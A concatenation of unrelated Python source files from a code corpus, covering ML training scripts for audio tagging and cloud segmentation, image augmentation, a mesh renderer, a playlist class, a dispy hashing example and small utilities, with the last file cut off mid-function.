from src.mixers import RandomMixer, AddMixer, SigmoidConcatMixer, UseMixerWithProb
from src.transforms import get_transforms
from src.argus_models import FreesoundModel
from src.utils import load_noisy_data, load_folds_data
from src import config
parser = argparse.ArgumentParser()
parser.add_argument('--experiment', required=True, type=str)
args = parser.parse_args()
BATCH_SIZE = 128
CROP_SIZE = 256
DATASET_SIZE = 128 * 256
NOISY_PROB = 0.01
CORR_NOISY_PROB = 0.42
MIXER_PROB = 0.8
WRAP_PAD_PROB = 0.5
CORRECTIONS = True
if config.kernel:
NUM_WORKERS = 2
else:
NUM_WORKERS = 8
SAVE_DIR = config.experiments_dir / args.experiment
PARAMS = {
'nn_module': ('AuxSkipAttention', {
'num_classes': len(config.classes),
'base_size': 64,
'dropout': 0.4,
'ratio': 16,
'kernel_size': 7,
'last_filters': 8,
'last_fc': 4
}),
'loss': ('OnlyNoisyLSoftLoss', {
'beta': 0.7,
'noisy_weight': 0.5,
'curated_weight': 0.5
}),
'optimizer': ('Adam', {'lr': 0.0009}),
'device': 'cuda',
'aux': {
'weights': [1.0, 0.4, 0.2, 0.1]
},
'amp': {
'opt_level': 'O2',
'keep_batchnorm_fp32': True,
'loss_scale': "dynamic"
}
}
def train_fold(save_dir, train_folds, val_folds,
folds_data, noisy_data, corrected_noisy_data):
train_transfrom = get_transforms(train=True,
size=CROP_SIZE,
wrap_pad_prob=WRAP_PAD_PROB,
resize_scale=(0.8, 1.0),
resize_ratio=(1.7, 2.3),
resize_prob=0.33,
spec_num_mask=2,
spec_freq_masking=0.15,
spec_time_masking=0.20,
spec_prob=0.5)
mixer = RandomMixer([
SigmoidConcatMixer(sigmoid_range=(3, 12)),
AddMixer(alpha_dist='uniform')
], p=[0.6, 0.4])
mixer = UseMixerWithProb(mixer, prob=MIXER_PROB)
curated_dataset = FreesoundDataset(folds_data, train_folds,
transform=train_transfrom,
mixer=mixer)
noisy_dataset = FreesoundNoisyDataset(noisy_data,
transform=train_transfrom,
mixer=mixer)
corr_noisy_dataset = FreesoundCorrectedNoisyDataset(corrected_noisy_data,
transform=train_transfrom,
mixer=mixer)
dataset_probs = [NOISY_PROB, CORR_NOISY_PROB, 1 - NOISY_PROB - CORR_NOISY_PROB]
print("Dataset probs", dataset_probs)
print("Dataset lens", len(noisy_dataset), len(corr_noisy_dataset), len(curated_dataset))
train_dataset = RandomDataset([noisy_dataset, corr_noisy_dataset, curated_dataset],
p=dataset_probs,
size=DATASET_SIZE)
val_dataset = FreesoundDataset(folds_data, val_folds,
get_transforms(False, CROP_SIZE))
train_loader = DataLoader(train_dataset, batch_size=BATCH_SIZE,
shuffle=True, drop_last=True,
num_workers=NUM_WORKERS)
val_loader = DataLoader(val_dataset, batch_size=BATCH_SIZE * 2,
shuffle=False, num_workers=NUM_WORKERS)
model = FreesoundModel(PARAMS)
callbacks = [
MonitorCheckpoint(save_dir, monitor='val_lwlrap', max_saves=1),
ReduceLROnPlateau(monitor='val_lwlrap', patience=6, factor=0.6, min_lr=1e-8),
EarlyStopping(monitor='val_lwlrap', patience=18),
LoggingToFile(save_dir / 'log.txt'),
]
model.fit(train_loader,
val_loader=val_loader,
max_epochs=700,
callbacks=callbacks,
metrics=['multi_accuracy', 'lwlrap'])
if __name__ == "__main__":
if not SAVE_DIR.exists():
SAVE_DIR.mkdir(parents=True, exist_ok=True)
else:
print(f"Folder {SAVE_DIR} already exists.")
with open(SAVE_DIR / 'source.py', 'w') as outfile:
outfile.write(open(__file__).read())
print("Model params", PARAMS)
with open(SAVE_DIR / 'params.json', 'w') as outfile:
json.dump(PARAMS, outfile)
folds_data = load_folds_data(use_corrections=CORRECTIONS)
noisy_data = load_noisy_data()
corrected_noisy_data = get_corrected_noisy_data()
for fold in config.folds:
val_folds = [fold]
train_folds = list(set(config.folds) - set(val_folds))
save_fold_dir = SAVE_DIR / f'fold_{fold}'
print(f"Val folds: {val_folds}, Train folds: {train_folds}")
print(f"Fold save dir {save_fold_dir}")
train_fold(save_fold_dir, train_folds, val_folds,
folds_data, noisy_data, corrected_noisy_data)
| StarcoderdataPython |
1714361 | import numpy as np
def rand_bbox(height, width, lamda):
# Size of the cropping region
cut_ratio = np.sqrt(1 - lamda)
cut_height = np.int(height * cut_ratio)
cut_width = np.int(width * cut_ratio)
# Coordinates of the center
center_width = np.random.randint(width)
center_height = np.random.randint(height)
# Coordinates of the bounding box
width_start = np.clip(center_width - cut_width // 2, 0, width)
width_end = np.clip(center_width + cut_width // 2, 0, width)
height_start = np.clip(center_height - cut_height // 2, 0, height)
height_end = np.clip(center_height + cut_height // 2, 0, height)
return width_start, width_end, height_start, height_end
def perform_cutmix(image_content_alpha,
one_hot_encoding_tuple_alpha,
image_content_beta,
one_hot_encoding_tuple_beta,
alpha=0.4):
"""
https://github.com/clovaai/CutMix-PyTorch
https://www.kaggle.com/c/bengaliai-cv19/discussion/126504
"""
# Get lamda from a Beta distribution
lamda = np.random.beta(alpha, alpha)
# Get coordinates of the bounding box
height, width = image_content_alpha.shape[:2]
width_start, width_end, height_start, height_end = rand_bbox(
height, width, lamda)
lamda = 1 - (height_end - height_start) * (width_end -
width_start) / (height * width)
# Copy the region from the second image
image_content = image_content_alpha.copy()
image_content[height_start:height_end,
width_start:width_end] = image_content_beta[
height_start:height_end, width_start:width_end]
# Modify the one hot encoding vector
one_hot_encoding_tuple = []
for one_hot_encoding_alpha, one_hot_encoding_beta in zip(
one_hot_encoding_tuple_alpha, one_hot_encoding_tuple_beta):
one_hot_encoding = one_hot_encoding_alpha * lamda + one_hot_encoding_beta * (
1 - lamda)
one_hot_encoding_tuple.append(one_hot_encoding)
one_hot_encoding_tuple = tuple(one_hot_encoding_tuple)
return image_content, one_hot_encoding_tuple
def perform_mixup(image_content_alpha,
one_hot_encoding_tuple_alpha,
image_content_beta,
one_hot_encoding_tuple_beta,
alpha=0.4):
"""
https://github.com/facebookresearch/mixup-cifar10
https://www.kaggle.com/c/bengaliai-cv19/discussion/126504
"""
# Get lamda from a Beta distribution
lamda = np.random.beta(alpha, alpha)
# MixUp
image_content = lamda * image_content_alpha + (1 -
lamda) * image_content_beta
# Modify the one hot encoding vector
one_hot_encoding_tuple = []
for one_hot_encoding_alpha, one_hot_encoding_beta in zip(
one_hot_encoding_tuple_alpha, one_hot_encoding_tuple_beta):
one_hot_encoding = one_hot_encoding_alpha * lamda + one_hot_encoding_beta * (
1 - lamda)
one_hot_encoding_tuple.append(one_hot_encoding)
one_hot_encoding_tuple = tuple(one_hot_encoding_tuple)
return image_content, one_hot_encoding_tuple
| StarcoderdataPython |
3312917 | <gh_stars>0
#!/usr/bin/env python3
import notificore_restapi as api
# noinspection PyPackageRequirements
from tests.settings import API_KEY
requester = api.BalanceAPI(config=dict(api_key=API_KEY))
BALANCE_ATTRIBUTES = ['amount', 'currency', 'limit']
def test_api_balance_balance_api():
response = requester.get()
assert isinstance(response, dict)
for attribute in BALANCE_ATTRIBUTES:
assert response.get(attribute)
| StarcoderdataPython |
112115 | <gh_stars>1-10
#!/usr/bin/env python
#
# Copyright 2019 DFKI GmbH.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the
# following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
# NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
# USE OR OTHER DEALINGS IN THE SOFTWARE.
from copy import deepcopy
import numpy as np
from ...graphics.geometry.mesh import Mesh
from .component_base import ComponentBase
from ...graphics import materials
from ...graphics import renderer
from ...graphics.material_manager import MaterialManager
from ...graphics.materials import TextureMaterial
SKELETON_NODE_TYPE_ROOT = 0
SKELETON_NODE_TYPE_JOINT = 1
SKELETON_NODE_TYPE_END_SITE = 2
MAX_BONES = 150
RENDER_MODE_NONE = 0
RENDER_MODE_STANDARD = 1
RENDER_MODE_NORMAL_MAP = 2
RENDER_MODES = [RENDER_MODE_NONE, RENDER_MODE_STANDARD, RENDER_MODE_NORMAL_MAP]
class AnimatedMeshComponent(ComponentBase):
def __init__(self, scene_object, mesh_list, skeleton_def, animation_source="animation_controller", scale=1):
ComponentBase.__init__(self, scene_object)
self._scene_object = scene_object
self.anim_controller = scene_object._components[animation_source]
self.render_mode = RENDER_MODE_STANDARD
self.meshes = []
material_manager = MaterialManager()
for m_desc in mesh_list:
geom = None
if "material" in m_desc:
material = None
if "Kd" in m_desc["material"]:
texture_name = m_desc["texture"]
if texture_name is not None and texture_name.endswith(b'Hair_texture_big.png'):
continue
material = material_manager.get(m_desc["texture"])
if material is None:
material = materials.TextureMaterial.from_image(m_desc["material"]["Kd"])
material_manager.set(m_desc["texture"], material)
elif "albedo_texture" in m_desc["material"]:
material = TextureMaterial.from_image(m_desc["material"]["albedo_texture"])
#geom = Mesh.build_legacy_animated_mesh(m_desc, material)
geom = Mesh.build_from_desc(m_desc, material)
else:
geom = Mesh.build_from_desc(m_desc, materials.red)
if geom is not None:
self.meshes.append(geom)
self.inv_bind_poses = []
for idx, name in enumerate(skeleton_def["animated_joints"]):
inv_bind_pose = skeleton_def["nodes"][name]["inv_bind_pose"]
self.inv_bind_poses.append(inv_bind_pose)
self.vertex_weight_info = [] # store for each vertex a list of tuples with bone id and weights
for idx, m in enumerate(mesh_list):
self.vertex_weight_info.append(mesh_list[idx]["weights"])
self.scale_mesh(scale)
print("number of matrices", len(self.inv_bind_poses))
def update(self, dt):
return
def get_bone_matrices(self):
matrices = np.array(self.anim_controller.get_bone_matrices())
for idx, inv_m in enumerate(self.inv_bind_poses):
matrices[idx] = np.dot(matrices[idx],inv_m)
return matrices
def scale_mesh(self, scale_factor):
for m in self.meshes:
m.scale(scale_factor)
for idx, m in enumerate(self.inv_bind_poses):
self.inv_bind_poses[idx][:3, 3] *= scale_factor
def prepare_rendering(self, renderer):
bone_matrices = self.get_bone_matrices()
renderer.upload_bone_matrices(bone_matrices)# bone matrices once
def get_meshes(self):
return self.meshes
| StarcoderdataPython |
4838789 | <gh_stars>0
#/usr/bin/python
from __future__ import print_function
import random
import copy
'''
playlist.py
Python class that represents a playlist
@author: <NAME> <<EMAIL>>
'''
__author__ = "<NAME>"
class Playlist:
'''
Class that represents a playlist to be played by the Pi
'''
def __init__(self, id, name, tracks):
'''
Constructor
:param: id Playlist unique id (unique to streaming service)
:param: name Name of the playlist
:param: tracks List of track objects
'''
self.id = id
self.name = name
# keep two copies of the tracks (used for suffling)
self.tracks_original = copy.deepcopy(tracks)
self.tracks_shuffle = copy.deepcopy(tracks)
self.isShuffle = False
# default to pointing to the original
self.tracks = self.tracks_original
# current track
self.cur = 0
# file that stores the text-to-speech read-out of the file (to be set
# by the playback service)
self.ttsFile = None
def __str__(self):
'''
__str__
:return: String representation of a Playlist
'''
trackStr = ""
for track in self.tracks:
trackStr += str(track) + ", "
return str(self.id) + ": " + self.name + " -> [ " + trackStr + " ]"
def current(self):
'''
Return the unique id of the current song (to play)
:return: Unique id of the song to play
'''
song_id = self.tracks[self.cur].id
return song_id
def prev(self):
'''
Moves to the previous song (wraps-around) and returns that song
:return: Unique id of the song to play
'''
if (self.cur == 0):
self.cur = len(self.tracks) - 1
else:
self.cur -= 1
return self.current()
def next(self):
'''
Moves to the next song (wraps-around) and returns that song
:return: Unique id of the song to play
'''
if (self.cur == (len(self.tracks) - 1)):
self.cur = 0
else:
self.cur += 1
return self.current()
def shuffle(self):
'''
Shuffles/de-shuffles a playlist
:return: Unique id of the song to play
'''
self.isShuffle = not(self.isShuffle)
if (self.isShuffle):
random.shuffle(self.tracks_shuffle)
self.tracks = self.tracks_shuffle
else:
self.tracks = self.tracks_original
def main():
'''
Main execution point for testing
'''
if __name__ == '__main__':
main()
| StarcoderdataPython |
4829562 | # pylint: skip-file
from opendbc.can.packer_pyx import CANPacker
assert CANPacker
| StarcoderdataPython |
113852 | from collections import deque
from constants import section_break_token,line_start_token
import os
import pickle
from pymongo import MongoClient
def add_to_trie(trie, tokens, depth):
history = deque(maxlen=depth)
for leaf_token in tokens:
trie[0] += 1
history.append(leaf_token)
for i in range(0, len(history)):
child=trie
for j in range(i, len(history)-1):
child = child[1][history[j]]
if leaf_token not in child[1]:
child[1][leaf_token] = [0,{}]
child[1][leaf_token][0] += 1
def tokenize_line(line):
# strip the text bare and split on whitespace
split_tokens = line.split()
# filter out empty tokens and make sure punctuation is separated
tokens = []
for split_token in split_tokens:
if len(split_token) == 0:
continue
elif len(split_token) == 1:
# prevent mulitple consecutive line breaks, or we'll end up with too many infinite newline spirals
#if (split_token == line_start_token) and (tokens[-1] == line_start_token):
#continue
tokens.append(split_token)
else:
final_char = split_token[-1]
if final_char in [',','.','?','!',';',':','…']:
tokens.append(split_token[:-1])
tokens.append(final_char)
else:
tokens.append(split_token)
return tokens
def tokenize_text(text):
tokens = [line_start_token]
lines = text.lower().replace('”','').replace('“','').replace('‘','').replace('’','').split("\n")
for line in lines:
line_tokens = tokenize_line(line)
if len(line_tokens) > 0:
tokens.extend(line_tokens)
tokens.append(line_start_token)
# terminate all snippets with a section break
if len(tokens) > 0:
tokens[-1] = section_break_token
return tokens
bin_path = os.environ['BIN_PATH']
client = MongoClient(os.environ['MONGO_CONNECTION_URI'])
db = client.pgte
print("Compiling")
trie_depth = 5
trie_quotes = [0, {}]
trie_attributions = [0, {}]
for chapter in db.chapters.find():
print("Adding quote from {0}: {1}".format(chapter['book'], chapter['title']))
quote_tokens = tokenize_text(chapter['quote'])
add_to_trie(trie_quotes, quote_tokens, trie_depth)
attribution_tokens = tokenize_text(chapter['attribution'][1:]) # prune initial '-'
add_to_trie(trie_attributions, attribution_tokens, trie_depth)
print("Saving compiled quotes")
with open("{0}/quotes.dat".format(bin_path), "wb") as f:
pickle.dump(trie_quotes, f)
print("Saving compiled attributions")
with open("{0}/attributions.dat".format(bin_path), "wb") as f:
pickle.dump(trie_attributions, f) | StarcoderdataPython |
135793 | raio = int(input())
pi = 3.14159
volume = float(4.0 * pi * (raio* raio * raio) / 3)
print("VOLUME = %0.3f" %volume)
| StarcoderdataPython |
3303364 | <reponame>joni115/neuralFrame
import yaml
import tempfile
from opennmt.runner import Runner
from opennmt.models.model import Model
from opennmt.config import load_config, load_model
class Neural:
"""
This class will be wrapped class from openNMT-tf.
https://arxiv.org/abs/1701.02810
"""
def __init__(self, config):
"""
Configuration for the model
:config: the configuration for the model.
-- :config_path: a list of path to configure the model
-- :model_type: a model type
-- :check_point_path: a check_point for the path
"""
self.__config = {}
for config_path in config['config_path']:
with open(config_path, 'r') as f:
self.__config.update(yaml.load(f.read()))
self.__config['model_type'] = config['model_type']
self.__config['checkpoint_path'] = config['checkpoint_path']
model = load_model(self.__config['model_dir'],
model_name=self.__config['model_type'])
self.model = Runner(model, self.__config, auto_config=config['auto_config'])
def infer(self, sentences):
"""
This method is to infer.
:sentences: a list of preprocessed sentences.
return a sentence translated.
"""
# we are using opennmt-tf so we should open a file to write sentences to translated.
file_to_translate = tempfile.NamedTemporaryFile('w', delete=False)
file_to_translate.writelines(sentences)
file_to_translate.close()
file_translated = tempfile.NamedTemporaryFile('w', delete=False)
file_translated.close()
self.model.infer(features_file=file_to_translate.name,
predictions_file=file_translated.name,
checkpoint_path=self.__config['checkpoint_path'])
with open(file_translated.name, 'r') as f:
sentences_translated = f.readlines()
return sentences_translated
| StarcoderdataPython |
3344310 | # Example program that uses 'setup' and 'cleanup' functions to
# initialize/de-initialize global variables on each node before
# computations are executed. Computations use data in global variables
# instead of reading input for each job.
# Under Windows global variables must be serializable, so modules
# can't be global variables: See
# https://docs.python.org/2/library/multiprocessing.html#windows for
# details.
def setup(data_file):
# read data in file to global variable
global data, algorithms, hashlib, time, file_name
import hashlib, time
data = open(data_file).read() # read file in to memory; data_file can now be deleted
file_name = data_file
if sys.version_info.major > 2:
data = data.encode() # convert to bytes
algorithms = list(hashlib.algorithms_guaranteed)
else:
algorithms = hashlib.algorithms
# if running under Windows, modules can't be global, as they are not
# serializable; instead, they must be loaded in 'compute' (jobs); under
# Posix (Linux, OS X and other Unix variants), modules declared global in
# 'setup' will be available in 'compute'
# 'os' module is already available (loaded by dispynode)
if os.name == 'nt': # remove modules under Windows
del hashlib, time
return 0
# 'cleanup' should have same argument as 'setup'
def cleanup(data_file):
global data, algorithms, hashlib, time, file_name
del data, algorithms, file_name
if os.name != 'nt':
del hashlib, time
def compute(n):
global hashlib, time
if os.name == 'nt': # Under Windows modules must be loaded in jobs
import hashlib, time
# 'data' and 'algorithms' global variables are initialized in 'setup'
alg = algorithms[n % len(algorithms)]
csum = getattr(hashlib, alg)()
csum.update(data)
time.sleep(2)
return (dispy_node_ip_addr, file_name, alg, csum.hexdigest())
if __name__ == '__main__':
import dispy, sys, os, glob
# each node processes a file in 'data_files' with 'NodeAllocate.allocate'
data_files = glob.glob(os.path.join(os.path.dirname(sys.argv[0]), '*.py'))
node_id = 0
# sub-class NodeAllocate to use node (and computation) specific 'depends'
# and 'setup_args'
class NodeAllocate(dispy.NodeAllocate):
def allocate(self, cluster, ip_addr, name, cpus, avail_info=None, platform='*'):
global node_id
data_file = data_files[node_id % len(data_files)]
node_id += 1
print('Node %s (%s) processes "%s"' % (ip_addr, name, data_file))
self.depends = [data_file] # 'depends' must be a list
self.setup_args = (data_file,) # 'setup_args' must be a tuple
return cpus
cluster = dispy.JobCluster(compute, nodes=[NodeAllocate('*')], setup=setup, cleanup=cleanup)
jobs = []
for n in range(10):
job = cluster.submit(n)
jobs.append(job)
for job in jobs:
job()
if job.status == dispy.DispyJob.Finished:
print('%s: "%s" %s: %s' % job.result)
else:
print(job.exception)
cluster.print_status()
cluster.close()
| StarcoderdataPython |
174042 | import os
import torch
import segmentation_models_pytorch as smp
import pandas as pd
from abc import abstractmethod
from pathlib import Path
from catalyst.dl.callbacks import AccuracyCallback, EarlyStoppingCallback, \
CheckpointCallback, PrecisionRecallF1ScoreCallback
from catalyst.dl.runner import SupervisedRunner
from sklearn.model_selection import train_test_split
from torch.utils.data import DataLoader
from torch.optim.lr_scheduler import ReduceLROnPlateau, CosineAnnealingLR, \
CosineAnnealingWarmRestarts, CyclicLR
from clouds.models import Pretrained, ResNet34FPN
from clouds.metrics import BCEDiceLoss, FocalLoss, HengFocalLoss
from clouds.io import ClassificationCloudDataset, CloudDataset, \
ClfSegCloudDataset
from .utils import get_preprocessing, get_training_augmentation, \
get_validation_augmentation, setup_train_and_sub_df, \
seed_everything
class TrainExperiment(object):
def __init__(self, config: dict):
"""
Args:
config (dict): from `train_classification_yaml.py`
Attributes:
config-related:
config (dict): from `train_classification_yaml.py`
io_params (dict): contains io-related parameters
image_folder (key: str): path to the image folder
df_setup_type (key: str): regular or pos_only
test_size (key: float): split size for test
split_seed (key: int): seed
batch_size (key: int): <-
num_workers (key: int): # of workers for data loaders
aug_key (key: str): One of the augmentation keys for
`get_training_augmentation` and `get_validation_augmentation`
in `scripts/utils.py`
opt_params (dict): optimizer related parameters
lr (key: str): learning rate
opt (key: str): optimizer name
Currently, only supports sgd and adam.
scheduler_params (key: str): dict of:
scheduler (key: str): scheduler name
{scheduler} (key: dict): args for the above scheduler
cb_params (dict):
earlystop (key: str):
dict -> kwargs for EarlyStoppingCallback
accuracy (key: str):
dict -> kwargs for AccuracyCallback
checkpoint_params (key: dict):
checkpoint_path (key: str): path to the checkpoint
checkpoint_mode (key: str): model_only or
full (for stateful loading)
split_dict (dict): train_ids and valid_ids
train_dset, val_dset: <-
loaders (dict): train/validation loaders
model (torch.nn.Module): <-
opt (torch.optim.Optimizer): <-
lr_scheduler (torch.optim.lr_scheduler): <-
criterion (torch.nn.Module): <-
cb_list (list): list of catalyst callbacks
"""
# for reuse
self.config = config
self.io_params = config["io_params"]
self.opt_params = config["opt_params"]
self.cb_params = config["callback_params"]
self.model_params = config["model_params"]
self.criterion_params = config["criterion_params"]
# initializing the experiment components
self.df, _, self.id_mask_count = self.setup_df()
train_ids, val_ids = self.get_split()
self.train_dset, self.val_dset = self.get_datasets(train_ids, val_ids)
self.loaders = self.get_loaders()
self.model = self.get_model()
self.opt = self.get_opt()
self.lr_scheduler = self.get_lr_scheduler()
self.criterion = self.get_criterion()
self.cb_list = self.get_callbacks()
@abstractmethod
def get_datasets(self, train_ids, valid_ids):
"""
Initializes the data augmentation and preprocessing transforms. Creates
and returns the train and validation datasets.
"""
return
@abstractmethod
def get_model(self):
"""
Creates and returns the model.
"""
return
def setup_df(self):
"""
Setting up the dataframe to have the `im_id` & `label` columns;
im_id: the base img name
label: the label name
"""
train_csv_path = self.config["train_csv_path"]
sample_sub_csv_path = self.config["sample_sub_csv_path"]
return setup_train_and_sub_df(train_csv_path, sample_sub_csv_path)
def get_split(self):
"""
Creates train/valid filename splits
"""
# setting up the train/val split with filenames
df_setup_type = self.io_params["df_setup_type"].lower()
split_seed: int = self.io_params["split_seed"]
test_size: float = self.io_params["test_size"]
# doing the splits
if df_setup_type == "pos_only":
print("Splitting the df with pos only ids...")
assert self.id_mask_count is not None
train_ids, valid_ids = train_test_split(self.id_mask_count["im_id"].values,
random_state=split_seed,
stratify=self.id_mask_count["count"],
test_size=test_size)
elif df_setup_type == "regular":
print("Splitting the df normally...")
train_ids, valid_ids = train_test_split(self.df["im_id"].drop_duplicates().values,
random_state=split_seed,
test_size=test_size)
return (train_ids, valid_ids)
def get_loaders(self):
"""
Creates train/val loaders from datasets created in self.get_datasets.
Returns the loaders.
"""
# setting up the loaders
b_size, num_workers = self.io_params["batch_size"], self.io_params["num_workers"]
train_loader = DataLoader(self.train_dset, batch_size=b_size,
shuffle=True, num_workers=num_workers)
valid_loader = DataLoader(self.val_dset, batch_size=b_size,
shuffle=False, num_workers=num_workers)
self.train_steps = len(self.train_dset) # for schedulers
return {"train": train_loader, "valid": valid_loader}
def get_opt(self):
assert isinstance(self.model, torch.nn.Module), \
"`model` must be an instance of torch.nn.Module`"
# fetching optimizers
lr = self.opt_params["lr"]
opt_name = self.opt_params["opt"].lower()
if opt_name == "adam":
opt = torch.optim.Adam(self.model.parameters(), lr=lr)
elif opt_name == "sgd":
opt = torch.optim.SGD(filter(lambda p: p.requires_grad,
self.model.parameters()),
lr=lr, momentum=0.9, weight_decay=0.0001)
return opt
def get_lr_scheduler(self):
assert isinstance(self.opt, torch.optim.Optimizer), \
"`optimizer` must be an instance of torch.optim.Optimizer"
sched_params = self.opt_params["scheduler_params"]
scheduler_name = sched_params["scheduler"].lower()
scheduler_args = sched_params[scheduler_name]
# fetching lr schedulers
if scheduler_name == "plateau":
scheduler = ReduceLROnPlateau(self.opt, **scheduler_args)
elif scheduler_name == "cosineannealing":
scheduler = CosineAnnealingLR(self.opt, **scheduler_args)
elif scheduler_name == "cosineannealingwr":
scheduler = CosineAnnealingWarmRestarts(self.opt,
**scheduler_args)
elif scheduler_name == "clr":
scheduler = CyclicLR(self.opt, **scheduler_args)
print(f"LR Scheduler: {scheduler}")
return scheduler
def get_criterion(self):
loss_name = self.criterion_params["loss"].lower()
if loss_name == "bce_dice_loss":
criterion = smp.utils.losses.BCEDiceLoss(eps=1.)
elif loss_name == "bce":
criterion = torch.nn.BCEWithLogitsLoss()
print(f"Criterion: {criterion}")
return criterion
def get_callbacks(self):
callbacks_list = [PrecisionRecallF1ScoreCallback(num_classes=4),#DiceCallback(),
EarlyStoppingCallback(**self.cb_params["earlystop"]),
AccuracyCallback(**self.cb_params["accuracy"]),
]
ckpoint_params = self.cb_params["checkpoint_params"]
if ckpoint_params["checkpoint_path"] != None: # hacky way to say no checkpoint callback but eh what the heck
mode = ckpoint_params["mode"].lower()
if mode == "full":
print("Stateful loading...")
ckpoint_p = Path(ckpoint_params["checkpoint_path"])
fname = ckpoint_p.name
# everything in the path besides the base file name
resume_dir = str(ckpoint_p.parents[0])
print(f"Loading {fname} from {resume_dir}. \
\nCheckpoints will also be saved in {resume_dir}.")
# adding the checkpoint callback
callbacks_list = callbacks_list + [CheckpointCallback(resume=fname,
resume_dir=resume_dir),]
elif mode == "model_only":
print("Loading weights into model...")
self.model = load_weights_train(ckpoint_params["checkpoint_path"], self.model)
return callbacks_list
class TrainClassificationExperiment(TrainExperiment):
"""
Stores the main parts of a classification experiment:
- df split
- datasets
- loaders
- model
- optimizer
- lr_scheduler
- criterion
- callbacks
"""
def __init__(self, config: dict):
"""
Args:
config (dict): from `train_classification_yaml.py`
"""
super().__init__(config=config)
def get_datasets(self, train_ids, valid_ids):
"""
Creates and returns the train and validation datasets.
"""
# preparing transforms
preprocessing_fn = smp.encoders.get_preprocessing_fn(self.model_params["encoder"],
"imagenet")
preprocessing_transform = get_preprocessing(preprocessing_fn)
train_aug = get_training_augmentation(self.io_params["aug_key"])
val_aug = get_validation_augmentation(self.io_params["aug_key"])
# creating the datasets
train_dataset = ClassificationCloudDataset(self.io_params["image_folder"],
df=self.df,
im_ids=train_ids,
transforms=train_aug,
preprocessing=preprocessing_transform)
valid_dataset = ClassificationCloudDataset(self.io_params["image_folder"],
df=self.df,
im_ids=valid_ids,
transforms=val_aug,
preprocessing=preprocessing_transform)
return (train_dataset, valid_dataset)
def get_model(self):
# setting up the classification model
model = Pretrained(variant=self.model_params["encoder"], num_classes=4,
pretrained=True, activation=None)
return model
class TrainSegExperiment(TrainExperiment):
"""
Stores the main parts of a segmentation experiment:
- df split
- datasets
- loaders
- model
- optimizer
- lr_scheduler
- criterion
- callbacks
Note: There is no model_name for this experiment. There is `encoder` and
`decoder` under `model_params`. You can also specify the attention_type
"""
def __init__(self, config: dict):
"""
Args:
config (dict): from `train_seg_yaml.py`
"""
super().__init__(config=config)
def get_datasets(self, train_ids, valid_ids):
"""
Creates and returns the train and validation datasets.
"""
# preparing transforms
encoder = self.model_params["encoder"]
preprocessing_fn = smp.encoders.get_preprocessing_fn(encoder,
"imagenet")
preprocessing_transform = get_preprocessing(preprocessing_fn)
train_aug = get_training_augmentation(self.io_params["aug_key"])
val_aug = get_validation_augmentation(self.io_params["aug_key"])
# creating the datasets
train_dataset = CloudDataset(self.io_params["image_folder"],
df=self.df,
im_ids=train_ids,
masks_folder=self.io_params["masks_folder"],
transforms=train_aug,
preprocessing=preprocessing_transform,
mask_shape=self.io_params["mask_shape"])
valid_dataset = CloudDataset(self.io_params["image_folder"],
df=self.df,
im_ids=valid_ids,
masks_folder=self.io_params["masks_folder"],
transforms=val_aug,
preprocessing=preprocessing_transform,
mask_shape=self.io_params["mask_shape"])
return (train_dataset, valid_dataset)
def get_model(self):
encoder = self.model_params["encoder"].lower()
decoder = self.model_params["decoder"].lower()
print(f"\nEncoder: {encoder}, Decoder: {decoder}")
# setting up the seg model
assert decoder in ["unet", "fpn"], \
"`decoder` must be one of ['unet', 'fpn']"
if decoder == "unet":
model = smp.Unet(encoder_name=encoder, encoder_weights="imagenet",
classes=4, activation=None,
**self.model_params[decoder])
elif decoder == "fpn":
model = smp.FPN(encoder_name=encoder, encoder_weights="imagenet",
classes=4, activation=None,
**self.model_params[decoder])
# calculating # of parameters
total = sum(p.numel() for p in model.parameters())
trainable = sum(p.numel() for p in model.parameters() if p.requires_grad)
print(f"Total # of Params: {total}\nTrainable params: {trainable}")
return model
class TrainClfSegExperiment(TrainExperiment):
"""
Stores the main parts of a classification + segmentation experiment:
- df split
- datasets
- loaders
- model
- optimizer
- lr_scheduler
- criterion
- callbacks
Note: There is no model_name for this experiment. There is `encoder` and
`decoder` under `model_params`. You can also specify the attention_type
"""
def __init__(self, config: dict):
"""
Args:
config (dict): from `train_seg_yaml.py`
"""
self.model_params = config["model_params"]
super().__init__(config=config)
def get_datasets(self, train_ids, valid_ids):
"""
Creates and returns the train and validation datasets.
"""
# preparing transforms
encoder = self.model_params["encoder"]
preprocessing_fn = smp.encoders.get_preprocessing_fn(encoder,
"imagenet")
preprocessing_transform = get_preprocessing(preprocessing_fn)
train_aug = get_training_augmentation(self.io_params["aug_key"])
val_aug = get_validation_augmentation(self.io_params["aug_key"])
# creating the datasets
train_dataset = ClfSegCloudDataset(self.io_params["image_folder"],
df=self.df,
im_ids=train_ids,
masks_folder=self.io_params["masks_folder"],
transforms=train_aug,
preprocessing=preprocessing_transform,
mask_shape=self.io_params["mask_shape"])
valid_dataset = ClfSegCloudDataset(self.io_params["image_folder"],
df=self.df,
im_ids=valid_ids,
masks_folder=self.io_params["masks_folder"],
transforms=val_aug,
preprocessing=preprocessing_transform,
mask_shape=self.io_params["mask_shape"])
return (train_dataset, valid_dataset)
def get_model(self):
encoder = self.model_params["encoder"].lower()
decoder = self.model_params["decoder"].lower()
print(f"\nEncoder: {encoder}, Decoder: {decoder}")
assert encoder == "resnet34" and decoder == "fpn", \
"Currently only ResNet34FPN is supported for CLF+Seg."
model = ResNet34FPN(num_classes=4, fp16=self.config["fp16"])
# calculating # of parameters
total = sum(p.numel() for p in model.parameters())
trainable = sum(p.numel() for p in model.parameters() if p.requires_grad)
print(f"Total # of Params: {total}\nTrainable params: {trainable}")
return model
def get_criterion(self):
loss_dict = {
"bce_dice_loss": BCEDiceLoss(activation="sigmoid"),
"bce": torch.nn.BCEWithLogitsLoss(),
